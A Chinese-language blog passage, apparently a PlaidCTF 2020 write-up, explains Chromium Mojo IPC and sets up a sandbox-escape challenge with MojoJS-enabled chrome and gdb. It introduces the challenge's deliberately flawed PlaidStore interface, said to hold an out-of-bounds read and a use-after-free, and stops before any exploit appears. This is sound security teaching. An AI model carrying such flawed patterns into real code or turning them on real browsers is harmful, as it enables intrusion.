<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.22.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="mojomojo术语message pipe是一对endpoints，对应通信的两端，每个endpoint保存一个传入消息队列，并且在一端写入消息可以有效地传送到另外一端，因此message pipe是双向的。一个mojom文件描述一组interfaces，其代表的是强类型的消息集合。给定一个mojom接口和一条message pipe，可以将其中指定为Remote，用来发送该接口描述的信息，另一">
<meta property="og:type" content="article">
<meta property="og:title" content="plaidctf2020 mojo writeup">
<meta property="og:url" content="http://example.com/2023/11/07/plaidctf2020-mojo-writeup/index.html">
<meta property="og:site_name" content="蓝桉&#39;s blog">
<meta property="og:description" content="mojomojo术语message pipe是一对endpoints，对应通信的两端，每个endpoint保存一个传入消息队列，并且在一端写入消息可以有效地传送到另外一端，因此message pipe是双向的。一个mojom文件描述一组interfaces，其代表的是强类型的消息集合。给定一个mojom接口和一条message pipe，可以将其中指定为Remote，用来发送该接口描述的信息，另一">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2023/11/07/plaidctf2020-mojo-writeup/image.png">
<meta property="og:image" content="http://example.com/2023/11/07/plaidctf2020-mojo-writeup/image1.png">
<meta property="og:image" content="http://example.com/2023/11/07/plaidctf2020-mojo-writeup/image2.png">
<meta property="article:published_time" content="2023-11-06T23:01:52.000Z">
<meta property="article:modified_time" content="2025-02-02T08:54:54.406Z">
<meta property="article:author" content="蓝桉">
<meta property="article:tag" content="chrome">
<meta property="article:tag" content="mojo">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/11/07/plaidctf2020-mojo-writeup/image.png">


<link rel="canonical" href="http://example.com/2023/11/07/plaidctf2020-mojo-writeup/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2023/11/07/plaidctf2020-mojo-writeup/","path":"2023/11/07/plaidctf2020-mojo-writeup/","title":"plaidctf2020 mojo writeup"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>plaidctf2020 mojo writeup | 蓝桉's blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="蓝桉's blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">蓝桉's blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#mojo"><span class="nav-number">1.</span> <span class="nav-text">mojo</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mojo%E6%9C%AF%E8%AF%AD"><span class="nav-number">2.</span> <span class="nav-text">mojo术语</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%9A%E4%B9%89%E4%B8%80%E4%B8%AA%E6%96%B0%E7%9A%84Frame-Interface"><span class="nav-number">3.</span> <span class="nav-text">定义一个新的Frame Interface</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%9A%E4%B9%89%E4%B8%80%E4%B8%AAinterface"><span class="nav-number">3.1.</span> <span class="nav-text">定义一个interface</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%9B%E5%BB%BApipe"><span class="nav-number">3.2.</span> <span class="nav-text">创建pipe</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%91%E9%80%81%E6%B6%88%E6%81%AF"><span class="nav-number">3.3.</span> <span class="nav-text">发送消息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%91%E9%80%81PendingReceiver%E7%BB%99Browser"><span class="nav-number">3.4.</span> <span class="nav-text">发送PendingReceiver给Browser</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%9E%E7%8E%B0interface"><span class="nav-number">3.5.</span> <span class="nav-text">实现interface</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#plaid-mojo-wp"><span class="nav-number"></span> <span class="nav-text">plaid mojo wp</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="nav-number">1.</span> <span class="nav-text">环境配置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B0%83%E8%AF%95"><span class="nav-number">2.</span> <span class="nav-text">调试</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">3.</span> <span class="nav-text">漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#oob"><span class="nav-number">3.1.</span> <span class="nav-text">oob</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#UAF%E6%BC%8F%E6%B4%9E"><span class="nav-number">3.2.</span> <span class="nav-text">UAF漏洞</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B0%83%E8%AF%95%E5%92%8C%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B"><span class="nav-number">4.</span> <span class="nav-text">调试和利用过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#oob-1"><span class="nav-number">4.1.</span> <span class="nav-text">oob</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">蓝桉</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/11/07/plaidctf2020-mojo-writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="蓝桉">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="蓝桉's blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="plaidctf2020 mojo writeup | 蓝桉's blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          plaidctf2020 mojo writeup
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2023-11-07 07:01:52" itemprop="dateCreated datePublished" datetime="2023-11-07T07:01:52+08:00">2023-11-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2025-02-02 16:54:54" itemprop="dateModified" datetime="2025-02-02T16:54:54+08:00">2025-02-02</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/chrome/" itemprop="url" rel="index"><span itemprop="name">chrome</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="mojo"><a href="#mojo" class="headerlink" title="mojo"></a>mojo</h2><h2 id="mojo术语"><a href="#mojo术语" class="headerlink" title="mojo术语"></a>mojo术语</h2><p>message pipe是一对endpoints，对应通信的两端，每个endpoint保存一个传入消息队列，并且在一端写入消息可以有效地传送到另外一端，因此message pipe是双向的。<br>一个mojom文件描述一组interfaces，其代表的是强类型的消息集合。<br>给定一个mojom接口和一条message pipe，可以将其中指定为Remote，用来发送该接口描述的信息，另一端指定为Recevier，用来接收接口的消息。<br>Receiver端必须和mojom接口的具体实现(implementation)相绑定，从而将收到的消息分发给对应的接口实现函数。</p>
<span id="more"></span>

<h2 id="定义一个新的Frame-Interface"><a href="#定义一个新的Frame-Interface" class="headerlink" title="定义一个新的Frame Interface"></a>定义一个新的Frame Interface</h2><p>假设我们想从render frame向其对应在browser进程里的RenderFrameHostImpl发送一个Ping消息，我们需要去定义一个mojom interface，创建一个pipe去使用这个interface，然后绑定好pipe的两端以发送和接收消息。</p>
<h3 id="定义一个interface"><a href="#定义一个interface" class="headerlink" title="定义一个interface"></a>定义一个interface</h3><p>第一步就是去创建一个.mojom文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//src/example/public/mojom/ping_responder.mojom</span><br><span class="line"></span><br><span class="line">module example.mojom</span><br><span class="line"></span><br><span class="line">interface PingResponder &#123;</span><br><span class="line">  // Receives a &quot;Ping&quot; and responds with a random integer.</span><br><span class="line">  Ping() =&gt; (int32 random);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>然后我们在对应的位置创建一个BUILD.gn</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># src/example/public/mojom/BUILD.gn</span><br><span class="line">import(&quot;//mojo/public/tools/bindings/mojom.gni&quot;)</span><br><span class="line">mojom(&quot;mojom&quot;) &#123;</span><br><span class="line">  sources = [ &quot;ping_responder.mojom&quot; ]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>之后我们使用ninja指令来生成对应的头文件<code>ninja -C out/asan_debug example/public/mojom</code>。</p>
<h3 id="创建pipe"><a href="#创建pipe" class="headerlink" title="创建pipe"></a>创建pipe</h3><p>现在我们就可以创建一个消息管道来使用此接口。<br>作为一般规则并且在使用Mojo时为了方便起见，接口的Remote端通常是创建新的pipe的一方。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// src/third_party/blink/example/public/ping_responder.h</span></span><br><span class="line">mojo::Remote&lt;example::mojom::PingResponder&gt; ping_responder;</span><br><span class="line">mojo::PendingReceiver&lt;example::mojom::PingResponder&gt; receiver =</span><br><span class="line">    ping_responder.<span class="built_in">BindNewPipeAndPassReceiver</span>();</span><br></pre></td></tr></table></figure>
<p>在此例中<code>ping_responder</code>是Remote端，而<code>PendingReceiver</code>则是receiver的前身，它调用<code>BindNewPipeAndPassReceiver</code>方法来返回。<br><strong>注意：PendingReceiver实际上没有做任何事情，它是一个惰性的单一消息管道端点持有者。它仅存在于使其端点在编译时更强类型化，表明该端点希望由相同接口类型的接收器绑定。</strong></p>
<h3 id="发送消息"><a href="#发送消息" class="headerlink" title="发送消息"></a>发送消息</h3><p>最后我们可以通过Rmote调用我们的<code>Ping()</code>来发送消息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// src/third_party/blink/example/public/ping_responder.h</span><br><span class="line">ping_responder-&gt;Ping(base::BindOnce(&amp;OnPong));</span><br></pre></td></tr></table></figure>
<p><strong>如果我们希望接收响应，必须在调用OnPong之前保持pingable对象的活性。毕竟，pingable拥有其消息管道端点。如果它被销毁，那么端点也将被销毁，将没有东西来接收响应消息。</strong><br>上述只是把渲染进程发送消息到浏览器进程，那么现在摆在面前的就是我们将接收器的消息传递给浏览器进程。</p>
<h3 id="发送PendingReceiver给Browser"><a href="#发送PendingReceiver给Browser" class="headerlink" title="发送PendingReceiver给Browser"></a>发送PendingReceiver给Browser</h3><p>值得注意的是，PendingReceivers（以及一般的消息管道端点）只是可以自由发送到 mojom 消息的另一种对象类型。将 PendingReceiver 传递到某个地方的最常见方式是将其作为某个已连接接口上的方法参数传递。始终在渲染器的 RenderFrameImpl 和浏览器中对应的RenderFrameHostImpl之间保持连接的一个接口是BrowserInterfaceBroker。该接口是获取其他接口的工厂。它的GetInterface方法接受一个 GenericPendingReceiver，允许传递任意接口接收器。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">interface BrowserInterfaceBroker &#123;</span><br><span class="line">  <span class="built_in">GetInterface</span>(mojo_base.mojom.GenericPendingReceiver receiver);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>由于GenericPendingReceiver可以从任何PendingReceiver隐式构造，所以可以使用之前通过BindNewPipeAndPassReceiver创建的receiver来调用此方法：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">RenderFrame* my_frame = <span class="built_in">GetMyFrame</span>();</span><br><span class="line">my_frame-&gt;<span class="built_in">GetBrowserInterfaceBroker</span>().<span class="built_in">GetInterface</span>(std::<span class="built_in">move</span>(receiver));</span><br></pre></td></tr></table></figure>
<p>这将传送PendingReceiver到browser进程里，并被BrowserInterfaceBroker接口的具体实现接收和处理。</p>
<h3 id="实现interface"><a href="#实现interface" class="headerlink" title="实现interface"></a>实现interface</h3><p>我们需要一个浏览器端实现我们的PingResponder接口。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;example/public/mojom/ping_responder.mojom.h&quot;</span></span></span><br><span class="line"><span class="comment">// PingResponderImpl 类的定义，实现 example::mojom::PingResponder 接口</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">PingResponderImpl</span> :</span> example::mojom::PingResponder &#123;</span><br><span class="line"> public:</span><br><span class="line">  <span class="comment">// 构造函数，接受一个待处理的 Mojo 接收器，并将其传递给 receiver_ 成员进行初始化</span></span><br><span class="line">  explicit <span class="title function_">PingResponderImpl</span><span class="params">(mojo::PendingReceiver&lt;example::mojom::PingResponder&gt; receiver)</span></span><br><span class="line">      : <span class="title function_">receiver_</span><span class="params">(this, <span class="built_in">std</span>::move(receiver))</span> &#123;&#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 重写 example::mojom::PingResponder 接口的 Ping 方法</span></span><br><span class="line">  <span class="type">void</span> <span class="title function_">Ping</span><span class="params">(PingCallback callback)</span> override &#123;</span><br><span class="line">    <span class="comment">// 通过调用 std::move(callback) 将回调函数传递给 Run 方法，响应随机的整数 4</span></span><br><span class="line">    <span class="built_in">std</span>::move(callback).Run(<span class="number">4</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line"> private:</span><br><span class="line">  mojo::Receiver&lt;example::mojom::PingResponder&gt; receiver_;  <span class="comment">// 用于处理接收到的 Mojo 消息</span></span><br><span class="line">  DISALLOW_COPY_AND_ASSIGN(PingResponderImpl);  <span class="comment">// 宏，禁止拷贝和赋值操作</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>RenderFrameHostImpl保存一个BrowserInterfaceBroker的实现，当此实现收到GetInterface方法调用时，它将调用先前为此特定接口注册的处理程序。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// render_frame_host_impl.h</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">RenderFrameHostImpl</span> &#123;</span><br><span class="line">  <span class="comment">// ... 其他成员和方法 ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// 声明 GetPingResponder 方法，接受一个待处理的 Mojo 接收器</span></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">GetPingResponder</span><span class="params">(mojo::PendingReceiver&lt;example::mojom::PingResponder&gt; receiver)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// ... 其他私有成员 ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// PingResponderImpl 对象的唯一指针，用于处理 PingResponder 接口</span></span><br><span class="line">  std::unique_ptr&lt;PingResponderImpl&gt; ping_responder_;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// BrowserInterfaceBrokerImpl 对象，用于实现 BrowserInterfaceBroker 接口</span></span><br><span class="line">  BrowserInterfaceBrokerImpl&lt;RenderFrameHostImpl, RenderFrameHost*&gt; broker_&#123;<span class="keyword">this</span>&#125;;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 用于处理 BrowserInterfaceBroker 接口的 Mojo 接收器</span></span><br><span class="line">  mojo::Receiver&lt;blink::mojom::BrowserInterfaceBroker&gt; broker_receiver_&#123;&amp;broker_&#125;;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// render_frame_host_impl.cc</span></span><br><span class="line"><span class="comment">// 实现 GetPingResponder 方法，在这个方法中使用接收器构造 PingResponderImpl 对象</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">RenderFrameHostImpl::GetPingResponder</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    mojo::PendingReceiver&lt;example::mojom::PingResponder&gt; receiver)</span> </span>&#123;</span><br><span class="line">  ping_responder_ = std::<span class="built_in">make_unique</span>&lt;PingResponderImpl&gt;(std::<span class="built_in">move</span>(receiver));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// browser_interface_binders.cc</span></span><br><span class="line"><span class="comment">// 实现 PopulateFrameBinders 方法，注册 PingResponder 的处理器</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">PopulateFrameBinders</span><span class="params">(RenderFrameHostImpl* host,</span></span></span><br><span class="line"><span class="params"><span class="function">                          mojo::BinderMap* map)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ... 其他操作 ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// 为 PingResponder 注册处理器，使用 RenderFrameHostImpl 的 GetPingResponder 方法</span></span><br><span class="line">  map-&gt;<span class="built_in">Add</span>&lt;example::mojom::PingResponder&gt;(base::<span class="built_in">BindRepeating</span>(</span><br><span class="line">    &amp;RenderFrameHostImpl::GetPingResponder, base::<span class="built_in">Unretained</span>(host)));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="plaid-mojo-wp"><a href="#plaid-mojo-wp" class="headerlink" title="plaid mojo wp"></a>plaid mojo wp</h1><p>下面我们来查看plaid 2020 mojo这道题目，这个题目是一个沙箱逃逸题目，非常适合新手入门</p>
<h2 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h2><p>由dockerfile中的命令可以得知，启动chrome的脚本为visit.sh。该脚本内容如下</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/bash</span></span><br><span class="line">timeout 20 ./chrome --headless --disable-gpu --remote-debugging-port=1338 --enable-blink-features=MojoJS,MojoJSTest &quot;$1&quot;</span><br></pre></td></tr></table></figure>
<p>我们可以设置一个–user-data-dir来更加方便的使用Devtools，该参数最直观的作用就是执行js代码时，所有的console.log输出都会同步至终端。<br>因此我们实际启动命令为</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./chrome --headless --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS,MojoJSTest http://0.0.0.0:8000/test.html</span><br></pre></td></tr></table></figure>
<p>之后我们开一个本地的端口，<code>python3 -m http.server 8000</code>,我们运行一下上面的命令来看一下结果,我们可以发现其输出了我们在文件里面执行的log命令。</p>
<img src="/2023/11/07/plaidctf2020-mojo-writeup/image.png" class="" title="image">

<h2 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h2><p>我们使用gdb脚本来进行调试</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">file ./chrome</span><br><span class="line"><span class="built_in">set</span> args --headless --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS,MojoJSTest http://0.0.0.0:8000/poc.html</span><br><span class="line"><span class="built_in">set</span> follow-fork-mode parent</span><br></pre></td></tr></table></figure>
<p>之后运行如下命令即可进行调试</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gdb -x debug.sh</span><br></pre></td></tr></table></figure>

<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>此题一共有两个漏洞，分别是越界读和一个UAF漏洞，其中UAF漏洞是利用的难点，也是本次分析的重点。我们首先来看其diff文件</p>
<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">module blink.mojom;</span><br><span class="line"></span><br><span class="line">// This interface provides a data store</span><br><span class="line">interface PlaidStore &#123;</span><br><span class="line"></span><br><span class="line">  // Stores data in the data store</span><br><span class="line">  StoreData(string key, array&lt;uint8&gt; data);</span><br><span class="line"></span><br><span class="line">  // Gets data from the data store</span><br><span class="line">  GetData(string key, uint32 count) =&gt; (array&lt;uint8&gt; data);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>上述文件是一个mojom文件，其会生成对应的接口头文件，之后我们便可以使用该头文件来实现自己的代码代码，我们来看一下其实现的代码</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">namespace</span> content &#123;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">RenderFrameHost</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">PlaidStoreImpl</span> : <span class="keyword">public</span> blink::mojom::PlaidStore &#123;</span><br><span class="line"> <span class="keyword">public</span>:</span><br><span class="line">  <span class="function"><span class="keyword">explicit</span> <span class="title">PlaidStoreImpl</span><span class="params">(RenderFrameHost *render_frame_host)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">Create</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">      RenderFrameHost* render_frame_host,</span></span></span><br><span class="line"><span class="params"><span class="function">      mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span></span>;</span><br><span class="line"></span><br><span class="line">  ~<span class="built_in">PlaidStoreImpl</span>() <span class="keyword">override</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// PlaidStore overrides:</span></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">StoreData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">      <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">      <span class="type">const</span> std::vector&lt;<span class="type">uint8_t</span>&gt; &amp;data)</span> <span class="keyword">override</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">GetData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">      <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">      <span class="type">uint32_t</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">      GetDataCallback callback)</span> <span class="keyword">override</span></span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span>:</span><br><span class="line">  